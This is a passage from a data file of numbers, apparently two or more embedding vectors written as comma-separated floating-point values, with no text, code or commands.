04489202,-0.0034058779,-0.006328338,0.022344882,-0.0046493392,-0.006411503,0.020602373,-0.017487407,0.019949712,-0.0006453589,0.0029599974,-0.0046848133,-0.0015700604,0.004976516,0.0020232268,0.0040122424,0.0046355235,-0.0055775177,0.0084257005,0.001423273,0.006046873,-0.006897819,-0.008924882,-0.023639416,0.030082017,-0.027068758,-0.0024255125,-0.017162934,-0.0018622787,-0.021825988,0.01972338,0.00052977045,-0.019233683,-0.005144092,-0.009020179,-0.001972017,-0.010024133,-0.012261776,0.0016094662,-0.006242464,0.01784272,-0.016694736,-0.023348987,0.012544275,-0.079627655,-0.0029741216,0.004689772,0.0047303834,0.028904587,-0.0055349376,-0.006105849,-0.011817273,0.015071656,-0.00751583,-0.008841448,0.00089933,-0.024005977,0.003140784,0.032541033,-0.005079175,-0.012484021,0.003043185,0.0028413017,-0.027973734,0.0054721492,0.020342235,-0.0114959525,-0.0067867176,0.0042448016,0.01219011,-0.006739515,-0.0039669513,-0.012304133,-0.0017978918,-0.012475754,-0.00078862585,-0.008663761,-0.0028493244,0.0058425874,0.008621868,-0.0053222743,0.008239261,-0.027533012,-0.03350676,-0.004550356,-0.011727101,-0.010016493,0.016804805,-0.021881504,0.008259497,-0.02153934,0.008651573,-0.0066617145,0.00029272845,-0.015372406,0.012073643,0.0029644421,0.002334811,-0.00049673906,0.026324643,-0.018435953,0.002956589,0.018262628,0.0026079295,-0.014502045,-0.0038408416,0.015780423,0.027051872,-0.003505223,-0.008541934,0.0019344912,0.0126772495,0.0062198024,0.016957378,0.0076851905,-0.027749253,-0.013189082,-0.014576797,-0.009629681,-0.001783153,-0.0012766019,-0.006166766,0.0029419947,0.0051508723,0.03171968,0.011844718,0.0051202057,-0.013491088,0.017651202,-0.00029708602,-0.0072735604,-0.013323348,0.012405308,0.012772583,0.0020292648,-0.018690003,0.017633928,-0.0073953085,0.021066768,0.026476374,-0.014864896,0.012346822,-0.0103103565,0.0059582787,0.006396537,-0.014754134,-0.0057937624,-0.0030704725,-0.008091846,-0.011269063,0.0064693918,-0.003343445,0.0030654795,-0.009449254,-0.020589154,0.0155379325,0.028432507,0.064344734,0.009633438,-0.0048959064,-0.006434891,0.016633173,-0.015133244,-0.028410995,-0.0064334585,-0.01920005,-0.02783611,0.020354597,0.013307856,-0.028348636,0.0063000266,-0.0017040906,-0.02226521,0.0013074313,-0.022999024,0.026727686,-0.0038845176,0.013280831,-0.014570106,0.0047646016,-0.033933386,0.015632125,-0.011806129,0.015752494,-0.0045874007,-0.006252594,-0.013771025,0.010121678,-0.022258824,0.00005974116,-0.017792674,-0.0063541383,-0.00070413697,-0.014510049,-0.01800474,-0.0019794146,0.013721393,-0.008914058,0.016265437,-0.007199809,0.01002049,0.00895977,-0.025723407,-0.016743071,-0.005835781,-0.015134826,-0.0023030937,0.0011949074,-0.020104555,-0.0026453522,0.007427842,-0.020010896,-0.017467719,-0.0066975714,-0.019712051,-0.024425153,0.005428846,0.0050421483,-0.04201148,0.0034125862,0.022031324,0.01542169,0.0121606365,-0.01904062,-0.02583516,0.009315435,-0.014681256,-0.022232234,-0.007761627,-0.0047259796,-0.015358743,-0.018346775,0.028017053,0.008247729,-0.02002646,-0.01837142,-0.015013485,-0.007311643,-0.020285582,-0.027334344,0.01464369,-0.011697913,-0.004427192,0.0033619094,-0.0158771,0.013493843,-0.008939776,-0.00016524122,0.00913785,0.010898858,0.005071729,0.024252387,-0.034097467,-0.00043302836,-0.020004975,-0.015016543,0.030315222,0.13908526,-0.0079018315,-0.0087634185,0.012818564,0.0076596932,0.004287853,0.025421329,0.00022012815,-0.002358297,-0.006301038,0.014885097,-0.004096325,0.006236567,-0.012620025,-0.006734336,0.027226599,0.009138134,-0.0031919198,0.02670733,0.0005174672,0.008660696,-0.00905527,-0.009390871,-0.03815865,-0.0019757904,-0.039663054,0.02839074,0.016218588,0.007022012,0.026259685,-0.012444925,-0.010337185,0.016440965,0.015655322,-0.009581729,0.023549374,0.008658669,-0.014038604,-0.0012114713,-0.017476523,0.018244494,-0.010065936,0.0073161134,-0.0088738585,0.004883222,-0.024217295,-0.0074661598,-0.022209411,-0.016185146,-0.019515095,0.011717663,-0.00022353533,0.012874276,-0.001960539,0.013551065,-0.018461784,0.009178324,0.002537168,-0.0076928204,0.008313765,0.010727259,0.010621062,-0.005707123,-0.021929048,0.019902358,-0.017770465,-0.01962515,-0.027610065,0.006571305,-0.01842138,-0.0059593758,-0.019967917,0.017027698,-0.0013778312,0.0060951766,0.007580175,-0.008655547,0.012675753,0.003901058,0.006627531,0.007664956,-0.0047598747,-0.005249685,-0.017543685,-0.007935115,0.00554703,-0.0015578936,0.020987645,-0.0029032375,-0.0009265096,-0.026587604,0.009917199,0.03591677,0.0035132256,-0.014176575,0.009976326,0.025055138,-0.006641292,0.010851436,-0.0009455502,-0.0098816715,-0.0015234739,-0.0139736,0.025158329,0.0045029814,0.0023546102,-0.006854465,0.0016569148,-0.0073787267,0.00047344816,0.0013900391,0.02929744,0.021430705,0.0057208096,-0.0016421914,0.030581424,-0.031685304,-0.011540378,0.030632192,-0.026276935,-0.0066386503,0.0059989523,0.02254337,0.028703883,0.019671723,0.0010555009,-0.014506958,-0.009449758,0.008221257,0.000592534,0.0002641285,-0.017455978,0.0105586685,0.021972185,0.012705412,0.005059029,0.02937209,0.019466117,0.003090995,0.005117692,-0.009699713,-0.009640959,-0.008679064,0.0019371244,0.013037646,-0.012405088,0.026724404,-0.012692592,0.010229864,-0.0027539344,0.009504502,0.007225523,-0.018674525,-0.015400394,-0.004853716,0.00158899,-0.015409069,0.005789588,0.005929257,-0.022260552,0.010876087,-0.012740894,0.0033011914,-0.038155172,0.01206054,0.008906487,0.021415537,-0.00043434423,-0.007658658,-0.01594955,0.0020466098,0.0053398474,-0.0033909183,-0.0037411316,-0.001160851,0.010150789,0.0056254966,0.026951592,-0.025834996,-0.001604902,0.020957507,-0.0075529977,0.013093597,-0.0001847063,0.029102584,0.004541982,-0.0020537623,0.0072934623,-0.015377663,0.026936086,0.008268891,-0.03293931,-0.0054163625,0.014790316,0.0074407626,0.019685695,-0.012709135,0.042415965,-0.032247074,-0.037987556,0.0067330953,0.00040481074,0.01775454,-0.009295012,0.009399111,0.0052425656,-0.011303484,-0.00024195354,-0.011677691,0.006998309,0.019374812,-0.014575442,-0.011444155,-0.008186811,0.0058602933,0.011048251,-0.0115108555,-0.0018072254,-0.010989615,-0.0018535797,0.026003392,0.0042726058,-0.0011183529,-0.00364814,-0.010563067,0.02514358,0.0097452095,-0.00003732501,0.016997656,-0.022099853,-0.02158082,0.015324638,0.01239499,-0.039725956,-0.019132439,0.0030009788,0.023116926,0.013647403,0.017723486,0.007607324,-0.0046748314,0.013273536,0.00586032,-0.009775153,-0.039688516,-0.010614049,-0.017961033,-0.0021572972,-0.010481897,-0.015861876,-0.013204892,-0.0055676214,-0.010519292,-0.012690504,-0.022156103,-0.0073261866,0.006747045,-0.0017362158,0.0088468855,-0.030565795,-0.0075062504,0.007350444,-0.0046662386,0.012373104,-0.004083572,0.002118965,0.020038722,-0.016715514,-0.00224385,0.005291204,-0.0124796415,0.015135281,-0.018427571,0.020250231,0.002003997,0.007685347,-0.004030199,0.0063780453,0.0016330999,-0.0207932,0.015061228,-0.023325957,-0.009303354,-0.011828159,-0.0014748172,-0.012984665,0.012178267,0.010770398,0.025656657,-0.05918397,-0.006920279,0.029795166,0.01821857,-0.019803204,0.015292801,-0.0035835635,-0.033634577,-0.011615668,0.01594658,0.017579162,-0.015015018,-0.03619755,0.0005711695,0.019617392,-0.027209975,0.0051526413,0.0070051304,-0.00028464536,-0.0075872354,0.011896761,-0.00017030079,0.0010776364,0.005895396,-0.002914429,0.0033768225,-0.0020204834,0.027773812,0.012966571,0.00753627,-0.0030814176,-0.0014294626,-0.0051789978,-0.006641359,-0.0024446896,0.006957521,-0.004343682,0.0022262135,-0.012378771,-0.027276624,-0.013054514,-0.0028719427,0.020441119,-0.007778726,-0.005658567,-0.0049424823,0.028444316,-0.007885613,0.12108279,-0.019445557,-0.005201859,-0.0049354723,0.0030311947,-0.016492423,0.00828098,0.020897025,0.014576059,0.026568675,0.015333701,-0.002169606,0.011408167,0.021668693,0.000800417,-0.010880509,0.013254135,0.12360001,-0.027645824,0.031379197,0.019405115,0.01855224,0.0055827145,0.0058568674,0.012414971,-0.111252815,0.0070484863,-0.028354848,0.006712517,-0.0050639715,-0.02456892,0.025816517,0.020377822,-0.00009007209,-0.0060683326,0.022711894,0.004052298,0.0016781553,-0.03146328,-0.008481905,0.015279306,0.0054794042,-0.0097659575,0.0023555632,-0.009272072,0.015204011,-0.054612573,-0.0039709667,0.008250766,0.021964971,-0.010857266,-0.022324653,0.030193489,0.0040778774,-0.0069297724,0.0014479291,-0.005747167,0.006313247,-0.03309515,-0.005749038,-0.029139075,0.013163808,-0.009884685,-0.0013826216,-0.007470017,-0.0068485076,-0.016988385,-0.0008030326,-0.008754834,0.024100171,0.037604474,0.0042559067,-0.021800162,-0.015276562,0.031510018,-0.0052596233,-0.014967552,-0.009188966,0.020900842,-0.007855212,0.02089249,0.024875516,-0.012891659,-0.0059694336,0.00013934323,0.012948071,-0.016180951,0.0009673158,0.02024164,0.00015853863,0.0019295581,0.009204331,-0.014614307,0.0073678703,-0.0055643343,0.032690845,0.014653171,0.00012412308,0.019448249,-0.013265178,-0.010545509,0.007084832,-0.009244671,-0.016532062,0.008225442,-0.0016839639,0.0040804856,-0.035821173,-0.007229814,0.012350707,0.0057163453,0.0069089234,-0.012594958,0.026075896,-0.002954628,-0.003588721,-0.015582368,-0.005908839,-0.030851815,0.014432645,-0.0015592763,0.00036061465,0.0011918109,0.0023882606,-0.013852265,-0.021893566,0.024865465,0.011055139,-0.009923403,-0.014530369,-0.017698428,0.0049861795,0.008807732,0.053917337,0.0009997867,-0.007315527,0.010011386,-0.032105543,-0.010775046,0.0063033286,-0.014881341,-0.0060139573,0.009538288,-0.0055855247,0.0017647013,-0.02070681,0.0058533507,-0.00664525],[-0.016352065,-0.0029222597,-0.020994538,-0.029591471,0.0035614138,-0.03986689,-0.0026424162,0.029564057,-0.01591651,0.0024008248,-0.0006627009,0.021857493,-0.004895608,-0.005354183,-0.022903875,-0.011968476,0.010912124,-0.00010522997,-0.0034194933,-0.005522798,0.003594536,-0.008219913,0.020842727,-0.014754023,0.0011963394,-0.008700093,0.009455141,-0.021145945,0.0009319011,0.017478686,-0.005891245,0.0020355303,0.0044291206,0.008115161,0.01879056,0.0008530099,-0.015560285,-0.016008118,-0.0019721843,-0.004568621,-0.013529128,0.012924184,-0.0006333546,0.040056355,-0.02115017,-0.013782143,0.004154028,0.021737654,-0.020480482,-0.0038379636,0.012368766,-0.0019151111,-0.007112794,0.011638862,-0.010422456,0.030975444,-0.009694898,-0.0008396724,-0.000026801185,0.00984913,-0.008267158,0.018141484,-0.0044470597,-0.02972249,0.0039593345,-0.018292442,0.010413575,-0.008993267,-0.0046335855,-0.024720486,0.0012207767,0.00016929634,0.0037251937,0.013977068,0.031917267,0.020615079,0.00505653,-0.020300237,-0.015738377,0.013532789,-0.012594889,-0.011867601,-0.007474751,0.00034929777,0.0035288536,0.0046945084,-0.006537278,-0.013705864,0.0010306842,-0.029717898,-0.012052028,0.0074273837,0.002551455,0.010602129,-0.009389886,0.015100324,0.00043440796,-0.0048135943,-0.018676128,0.017581085,-0.0013481966,-0.012593718,-0.030199617,0.008481593,0.012295249,-0.025879119,-0.0018108852,-0.015277658,0.004422309,-0.02907848,0.0036047988,0.0016109523,0.006870379,-0.004003838,-0.006490988,-0.017925212,-0.00009712016,-0.0040568644,-0.008427024,0.002567771,-0.003837283,0.028690746,0.0015013305,-0.0037007704,-0.006276258,-0.0051802536,0.0022819513,0.015667517,-0.00096408266,0.007219012,-0.010167638,0.017110225,0.0041089193,-0.011997725,0.0069924877,0.0030697903,-0.0030966643,-0.0083262725,-0.0054074787,-0.01505175,0.00046972808,-0.0021008025,0.010744439,0.006400993,0.018000638,0.0069907713,-0.00051698124,0.01081416,0.017544493,-0.011425496,0.0078082453,-0.011358873,-0.017075509,-0.019686423,0.00010472287,0.02843667,0.004104977,-0.01728769,-0.025093915,-0.0071465042,-0.008353351,0.009756569,0.012580899,-0.012585195,-0.009720281,-0.03425787,0.017348096,-0.020450886,-0.017205385,0.010213715,0.04373315,0.026632221,0.014435028,0.004099173,0.01515255,0.026941141,-0.0039724885,-0.017433168,-0.003140468,-0.011492125,0.019149147,0.015279381,0.0059916,-0.0075999554,-0.013002387,0.03659403,0.024444044,0.00048833864,-0.016100463,-0.017054688,0.015404791,-0.014845591,-0.008448623,0.010452814,-0.013710606,-0.023745788,-0.009336131,0.097176835,0.018451836,0.0061301105,-0.012332682,-0.0016284911,-0.013132208,-0.0030947444,-0.009987492,-0.006268671,-0.0068828883,-0.02582739,0.013749575,-0.010314755,0.011135712,-0.017984655,-0.010565913,0.00070341124,-0.0069252313,-0.060629547,0.020536065,0.02437321,0.00018364977,0.004254091,-0.005195554,0.0106855035,-0.0015751217,-0.02386184,-0.018401833,-0.018041398,-0.0035267838,0.0023802277,-0.0036682044,-0.023815466,0.003149439,0.01530142,-0.022881098,-0.010768558,0.001177864,-0.011457934,0.00075508986,-0.008963728,-0.0097660795,-0.006660591,0.005165988,0.0053999154,0.020435968,0.037501227,-0.0119723985,0.0077764816,0.022587785,0.007039385,-0.015380862,0.02469084,0.008605085,-0.026085425,-0.00907352,0.029737798,-0.000032304757,-0.022187555,0.0036159114,-0.00905202,0.013033066,0.004041759,0.028749596,0.010506565,-0.012870224,0.045468237,0.03473628,0.000103697625,0.027967246,-0.04140338,-0.0011067138,-0.01847051,-0.023445452,0.0013592569,0.017870268,-0.01339502,0.006525361,-0.01850486,0.015328474,-0.01313935,0.005281986,0.0107874265,0.0036187456,-0.012213928,0.007430371,-0.016219577,-0.013610336,-0.002500399,-0.0028480827,0.012205291,0.03616633,0.0035024472,0.0021470988,-0.009509243,0.030508189,-0.0029793943,-0.019143598,-0.006618555,-0.008581572,0.018561307,0.0073699905,-0.02715846,0.010181402,-0.015878437,0.009132065,-0.006837228,-0.006526369,0.0033545303,-0.008701193,0.02417116,-0.01474939,0.020048896,-0.023917822,-0.014822749,-0.030292006,0.008916833,-0.0065531656,-0.0034138076,-0.008388351,-0.02195872,0.0034455718,-0.013017239,0.026330518,-0.011949224,0.019370433,-0.029979927,-0.017091054,0.0040494544,-0.013826574,-0.017270368,0.013790624,-0.0023491548,-0.0026039337,0.010079055,0.028516967,0.013963119,-0.018201245,0.019141449,-0.0062665367,0.033474065,0.007949137,-0.0076778205,-0.029591734,-0.01856747,-0.022391513,0.006435305,-0.004698134,-0.021923488,0.022405772,0.016405324,0.01721988,0.01960638,0.02044975,-0.013816985,0.014483354,-0.0032964703,-0.01752867,-0.005852,-0.0064260233,-0.013800548,-0.00077970984,-0.021024033,0.012657105,-0.012316774,-0.03006898,0.010905632,0.080175556,0.013763818,-0.0033584372,0.01183437,-0.0076676225,-0.014375303,0.028485725,0.011570789,-0.0062872767,-0.009403329,-0.012250681,-0.029677762,-0.0022680385,0.0017871555,-0.022975666,0.0149706025,-0.033136446,0.0026191853,-0.044583704,-0.007251744,0.022155086,-0.010219879,0.015950775,0.011594189,0.006088953,0.0077865133,0.0055774515,0.002972418,-0.0010277674,-0.034011245,-0.011331788,-0.018508025,0.004174003,0.019421132,-0.03167385,0.0069433316,0.009904478,0.009019777,-0.009620037,-0.004299619,-0.0010569666,0.013132602,-0.0068558687,-0.02694158,0.004975991,0.063224785,0.004532777,0.0044766245,0.00010355146,0.019151818,0.00954674,0.01701172,-0.023107115,0.026503086,-0.01679828,0.035788476,0.015563355,-0.044680722,0.044869203,0.032020412,0.018929426,0.018589143,-0.011518553,0.014811044,0.00014251993,0.040658575,-0.00024119877,-0.015710693,0.0008462375,0.015328015,0.008918864,0.0033959707,-0.010793901,0.02489901,-0.012401339,0.020539934,-0.007860594,-0.0042439057,0.015254942,0.030345798,0.0013213224,-0.0036887175,0.010762213,0.0014192159,-0.0070560197,-0.022972038,-0.011496589,-0.00022303702,0.0045277197,-0.005308541,-0.012639801,0.017625624,0.00668419,0.004657773,0.03933471,0.009380713,0.014453728,0.026602894,0.0032947331,0.020583874,-0.0005954866,0.00005482409,0.020071706,-0.017824553,0.00049136207,-0.01033133,0.014652301,-0.0014550993,0.0022704771,0.024102882,-0.02258766,0.0060411175,-0.003657384,0.0023328818,-0.0011570583,-0.038427316,-0.014881539,-0.0012996469,-0.02524384,-0.008535944,0.018750412,-0.012223318,0.020037387,0.0069190683,-0.00473426,0.003298632,-0.017461544,-0.009281001,-0.010981,0.031601146,0.004433466,0.022591278,0.0003001762,-0.03807718,0.017131915,0.006253211,-0.016924182,-0.03501297,0.042366356,-0.0006196949,0.009071073,0.0283307,0.050931174,0.0026255806,0.009242162,0.029956905,0.035240825,0.0046129185,-0.027608426,-0.008546331,-0.012661368,-0.0037514404,0.01580542,-0.006016972,0.0009894873,0.0032380747,0.022756075,-0.022022389,-0.012316759,0.014379066,0.029166443,-0.027525913,0.007943592,-0.009714999,-0.031844668,0.028430171,-0.007286673,0.06249748,-0.020162052,-0.023641692,-0.005474619,0.020633282,0.00378017,-0.01284893,0.026176644,-0.023091469,0.0147857545,0.002836491,0.024627902,-0.011451409,0.011959033,-0.009462656,-0.006786282,0.0032631976,-0.0015069814,-0.012288513,0.00707265,0.016642375,-0.008227906,0.0041802297,-0.024861073,-0.0104074525,-0.00022195185,0.010132613,-0.0002849563,-0.025423635,-0.017952729,-0.026645446,-0.00033400176,0.02621771,-0.014088651,0.008116883,-0.002681891,0.026430987,-0.0031342455,-0.024230888,0.029271072,-0.01629737,0.0007978989,-0.009726498,0.03879967,0.023198845,-0.0075523457,0.0049558617,0.019840587,0.010528249,-0.009757827,0.0028634851,0.012219439,0.019272538,0.020187138,-0.009016198,-0.001871639,0.02022346,0.011110691,-0.0071540917,0.0044937558,-0.0003988996,-0.011362874,-0.012641137,-0.022445729,-0.016793374,-0.018444888,0.002666651,0.003046936,-0.0040300596,-0.023349345,0.01124583,0.01179047,-0.0014534219,-0.017334305,0.016782278,0.01462605,-0.00996655,0.030386461,0.0099901175,-0.0073504616,0.002872666,0.019387133,0.0055017774,-0.0043731555,0.009867347,0.014909906,-0.0019978313,-0.006064191,0.003420378,-0.015244164,-0.009388495,-0.01154286,0.0034657985,0.0010080655,0.02286808,0.005902566,-0.011960521,-0.024750298,-0.000627071,0.02197442,-0.033963993,-0.016575294,-0.0025254847,0.045783572,-0.014421675,-0.002226555,-0.007842824,-0.017261287,0.006337855,-0.014546301,0.022924652,-0.037935905,0.0053092926,0.01321348,0.009110764,-0.0034251858,0.038253207,0.010931276,0.0057499213,-0.013515131,-0.0035468675,-0.008951471,-0.000070803595,-0.00020600337,0.0071966443,0.018630486,0.012040535,-0.032082655,-0.012964318,-0.008151787,-0.030315284,-0.0307197,0.041557204,-0.0015103432,0.004603505,-0.0031646537,0.007409144,-0.00065512926,-0.013891025,0.024996353,-0.038711112,0.002995104,0.023787843,-0.02324071,0.005370215,-0.01267883,0.0012330032,-0.010075747,-0.034440562,-0.00830888,0.0043447046,0.012067176,-0.033087317,0.018967506,0.020021725,-0.004483874,0.02342389,-0.007734346,0.008504382,0.007489374,0.048118833,0.019017164,0.0034364397,0.0038181678,0.014486037,-0.0016824891,0.0055186553,0.0038558322,0.039887436,0.005411634,0.020567337,0.0004430003,-0.011731315,-0.0026987274,-0.02388534,0.022199385,0.022334803,0.012086648,-0.000845378,0.02261619,-0.018753009,0.027800884,-0.007617952,-0.009256165,-0.013867719,0.011725112,0.01643501,0.000020118357,0.026358506,0.0042386344,0.0040410277,-0.017043386,-0.016876573,-0.0063029723,0.024618782,0.008846945,0.0020270625,0.019807607,-0.002244726,0.011278473,-0.0028826285,0.00486052,-0.007004526,-0.015904354,-0.018283375,0.009838967,-0.010225828,0.0077164704,-0.04572631,0.0075063603,0.025749944,0.009886723,-0.0019313118,-0.016495556,-0.014395827,0.014930362,-0.0037544102,-0.046431024,-0.020122051,0.0033453174,0.029435027,-0.0328894,-0.009419675,0.022237191,0.008857746,0.004344805,0.024387287,-0.016770018,-0.012535348,0.012132649,-0.026572347,0.026039844,0.024517836,0.02673398,-0.002244157,-0.0053043705,0.0009711234,-0.008970454,0.0040761265,-0.016585702,-0.007911523,0.0068217875,0.0054033753,-0.010488489,-0.0107793575,-0.029003365,-0.012541009,0.018840024,-0.040127404,-0.01887108,-0.014922615,0.01164458,-0.0001564196,0.022604382,-0.029908331,0.035732616,0.021851286,-0.015527828,0.0036860034,-0.02481532,0.014959003,0.032831803,0.028151732,-0.021462213,-0.022857536,-0.00391055,0.011719578,-0.008988937,0.014830556,0.015095664,-0.0065752272,-0.022994716,-0.027073653,0.0022494483,-0.017637637,0.013880563,0.0048792884,-0.012388148,0.030329837,-0.02027405,0.023299031,0.021608021,0.0055847988,0.009541816,-0.015472324,0.025715675,-0.02605319,-0.029014276,0.021396331,-0.014463611,0.014134662,0.020448845,-0.033544563,-0.03227037,-0.023333764,0.001176431,-0.005041446,0.015115854,0.0012361463,-0.023296086,-0.023607252,0.00819226,0.0142507125,0.016824825,-0.026199507,-0.012211343,0.014490993,0.0010677568,-0.0048723156,0.018810263,-0.021440445,0.014806809,0.016831588,0.013867781,0.012892668,0.0037452332,0.01443908,0.0012488903,0.012289468,0.019520525,-0.032166995,0.016803516,-0.0020864212,0.00803991,0.033736013,0.000378827,-0.004853322,-0.006129138,-0.035014436,-0.011641519,-0.011644482,0.02381159,-0.018152997,0.013668706,0.00053603685,0.010755164,0.0011753844,0.0022192174,0.026323527,-0.003008763,-0.010294042,0.025725605,-0.00050048693,-0.02517342,-0.02340268,0.012708622,0.012958357,0.0052687167,0.0029538781,0.009102176,0.007935067,0.035741985,-0.0032656265,-0.014620306,0.03453238,-0.009774332,0.010207302,0.0059320806,0.014008747,-0.007064972,-0.0028702638,0.009099844,-0.024595352,-0.0061803395,-0.0011078754,0.00057550706,0.004622634,-0.012575778,0.0024246522,0.005246808,0.00177853,0.030329742,-0.012103134,0.01015469,-0.007913052,0.028036054,-0.002941147,0.0013183309,0.013287328,-0.0065862993,0.00091610494,0.009513969,0.007644113,-0.023566315,0.0116426945,-0.011650827,-0.0027091054,0.012837276,0.0117310565,0.01645639,-0.011687279,-0.015750544,0.035466775,0.027738295,-0.012747652,0.0062565147,-0.036690243,-0.029515741,-0.0051224,-0.0075645465,-0.0037062725,-0.014245421,0.0039264695,0.013311343,-0.01364202,-0.019235885,-0.026494788,-0.058034997,0.010639981,-0.026235588,-0.012208361,0.009323854,0.01328302,-0.004574588,0.023980811,0.046652652,0.003955904,0.0130400695,0.017181586,0.013203343,-0.0013953086,0.016296178,0.004340221,-0.033584487,0.013548529,0.028397838,-0.0059543177,0.015232425,-0.0013293639,0.015008063,0.021745596,0.04103938,0.001181406,-0.026613124,-0.013318607,-0.029462585,0.00555257,-0.0038878883,0.009789424,0.011670212,-0.0025480308,-0.011682536,-0.009472694,0.0037075807,0.012579393,-0.017729534,0.008900833,-0.011665373,0.006490611,-0.0104333805,0.012930944,-0.010340954,-0.011473155,0.003964573,-0.019812405,-0.005055196,-0.019638194,0.020903,-0.0017495102,0.0022424927,0.031948786,-0.0006837656,0.028710568,-0.010704366,0.026442967,0.02714858,-0.006147868,0.021280881,-0.004602616,0.009276817,0.020239938,-0.02726925,-0.0072699143,-0.0061608423,0.022948943,-0.005889934,-0.020569,0.0041067684,-0.010528641,0.00027334873,0.0054953173,-0.011442242,0.016606448,-0.0050587757,0.0070049237,-0.008507173,-0.011390812,-0.015256606,0.020937266,-0.034537118,0.0050528767,-0.023873968,-0.0017414475,0.007682461,0.00008048138,0.011384729,-0.024262108,-0.006411396,-0.017530238,-0.019952293,0.01921106,0.010074816,0.04067508,-0.0021210401,-0.005574507,0.0121380435,-0.0026829739,0.018568719,0.004685512,-0.009299822,0.040129554,-0.001855968,0.0010831995,-0.01777632,0.013157432,0.030511068,0.022845345,-0.02275442,0.023669915,-0.00432016,-0.002669157,0.044078965,0.002587839,-0.009141981,0.0006593594,0.014305293,0.038261626,0.005009976,0.010249483,0.04196021,0.00008328628,0.015475954,0.030195244,0.020004904,-0.022065459,-0.017943243,0.008284899,0.0030225893,0.010260255,-0.0027285349,-0.018556897,0.011025959,0.0077163083,0.006614211,-0.03458624,-0.027291004,-0.0010317689,-0.008882717,0.01453221,-0.016413327,0.0011824772,-0.0046589365,-0.022411691,-0.0018502491,0.0066808965,0.004756342,0.002390158,0.00278692,0.005322963,0.011629784,0.01323779,-0.017285822,0.012119467,-0.009663547,-0.022956999,0.0037983132,0.015700622,0.0049601095,-0.014571612,0.0052775717,0.003995682,-0.019156374,0.014067798,-0.01755633,0.0025716817,0.0027037223,-0.019166507,0.008127742,0.020123208,-0.011072888,0.024126492,0.00011642167,-0.019094067,0.021475546,-0.0008981459,0.0025875892,0.008434276,-0.009937651,0.052143477,0.008042725,0.0054852692,0.009186499,-0.0076682298,0.0066267247,-0.0070996224,-0.01744098,-0.024084302,-0.0060546994,-0.0064575872,0.013834082,0.0079494435,-0.019102793,0.037114844,-0.015845703,0.034788683,0.0036777405,-0.02633386,-0.008490984,0.037904404,0.026219053,0.009177237,-0.014298132,0.015296754,0.015117594,-0.054397736,-0.0067207296,-0.00024401007,-0.0052930475,-0.008760384,0.00482699,-0.013007541,-0.027156794,0.002192211,-0.035081137,0.0004070044,0.019121855,-0.01656309,0.018659584,0.0050450233,0.007912238,-0.011108862,0.0045249094,-0.019436276,0.010519959,0.023914311,0.0015771451,-0.00172203,0.021369921,-0.001029573,0.03395133,0.02002145,-0.035790488,-0.016731026,-0.0071003675,0.0008326448,-0.0043203006,-0.012725994,-0.0035010807,0.0053438027,0.018569063,-0.0112176845,-0.017541451,0.041764587,-0.008537919,-0.00266075,-0.00334783,0.03060609,-0.014866349,0.024834493,0.0063353963,0.020334756,-0.01406531,-0.016871186,-0.015188153,-0.012864005,-0.007226691,-0.004803689,-0.0034868564,-0.011002,-0.020107731,0.005092376,-0.011883015,0.00408187,-0.009280234,0.012842918,0.005372701,0.002467729,0.004521934,0.01875129,-0.0011456809,0.011416917,0.008995255,-0.0041299136,-0.004908898,-0.0001753567,0.01692073,0.0188249,0.017013215,-0.0061607976,0.0077487067,-0.019595746,0.009756947,0.033105623,0.025571944,-0.006191946,0.022997925,0.004192994,-0.015822036,-0.0142090665,0.005194952,-0.004210968,0.017695185,-0.010601792,-0.013009907,-0.004459614,-0.013338726,-0.012732051,0.07256681,-0.00038095476,0.009133542,0.014665978,0.016819417,-0.02875457,0.02696422,0.003563098,0.010147306,-0.016975053,-0.02638057,-0.025862653,-0.019052813,-0.020733068,0.016442636,0.001949327,-0.0014544184,0.011234139,0.002459425,0.004489135,-0.0013631067,-0.009411934,0.0008200721,0.008845328,0.011729054,0.01864822,0.017669378,-0.029657472,0.025583498,-0.003515049,-0.00430751,-0.015159722,0.012329529,-0.00056659104,-0.0067573423,-0.006622179,0.022141071,-0.018251253,-0.011281749,0.012835748,-0.000028671173,-0.014440392,0.035186596,0.015704349,0.018007556,-0.014462615,-0.020443534,-0.009915604,0.02309202,-0.016632834,0.016948843,-0.005029088,-0.0083674,-0.0020384106,-0.017782098,0.02603982,0.019326298,0.020263394,0.015849004,-0.01700356,0.0034168675,-0.006529381,-0.0007104572,-0.0041641616,-0.015251351,0.006375942,0.0042473758,-0.009381287,0.021508576,-0.02550305,-0.0034068949,0.005958005,0.010287787,0.014617023,0.0012904842,0.002161118,0.020405738,-0.016845202,-0.028026411,-0.024331236,-0.012662034,-0.0019742383,0.032361392,0.009390573,-0.017845739,0.018338036,0.016122773,0.006149606,0.040030133,0.0051573166,0.02031512,-0.0033094692,-0.0037025106,0.034894634,0.017649423,0.02066474,-0.0028202368,0.001789172,-0.016271384,0.0252746,-0.001694372,0.009135944,0.010924398,-0.018151507,0.00017311086,-0.006506796,-0.0013512867,-0.010183993,0.018808229,0.03532765,0.016636746,0.00060631084,0.003938599,-0.00182162,0.005989738,-0.0042080577,0.012035133,-0.007044924,-0.0046028197,0.016427085,0.0142324865,0.0060581323,0.00036015746,-0.03310069,0.0043259277,0.13308941,0.014472124,-0.0048262,0.024730483,-0.0016315375,0.013821524,-0.087688036,0.009715634,0.004687279,-0.009348314,0.008584098,-0.012257633,-0.025405642,0.017203333,0.016274732,0.0060866917,-0.00839115,-0.02233201,0.026641121,-0.012669072,-0.0062984633,-0.0076807705,-0.0082128905,-0.010123774,-0.020075578,-0.010642883,0.01145465,-0.010093224,0.00221261,-0.018275822,-0.008827007,-0.0074121305,0.025543138,-0.0085742595,-0.0047120997,0.025258213,0.01941496,0.011957574,-0.0223144,-0.019324882,0.013595565,0.0058995658,-0.0141721,-0.018561304,-0.15159105,0.008437177,-0.0013986062,-0.04062703,0.022827096,-0.0061758924,0.0041584396,-0.0064582326,0.013262247,-0.015721291,-0.010857001,0.02992937,-0.010445382,0.0068538673,-0.0061435704,-0.0017701662,-0.009942996,0.011848337,0.0076237237,-0.008391414,0.0075936634,-0.009552566,-0.011719213,-0.025785007,-0.017702715,0.0023902382,-0.0030100069,0.029585414,-0.013701228,0.0039213416,-0.0060480917,-0.0031698977,-0.013214766,0.0025523866,-0.013191131,0.0010131539,-0.018681295,0.020822871,-0.02193748,0.012623751,-0.0003614287,-0.0006295767,-0.008376719,0.0027811688,0.013580672,0.001459759,0.019583542,0.007274063,0.014367607,-0.0034244705,0.023782426,-0.004059414,-0.024538178,0.014843844,-0.012633658,-0.002636806,-0.017669098,-0.027752705,-0.010804457,0.021697083,-0.014925076,-0.02148513,-0.004401654,-0.002390471,0.023737699,0.000065464534,0.014961995,-0.044141147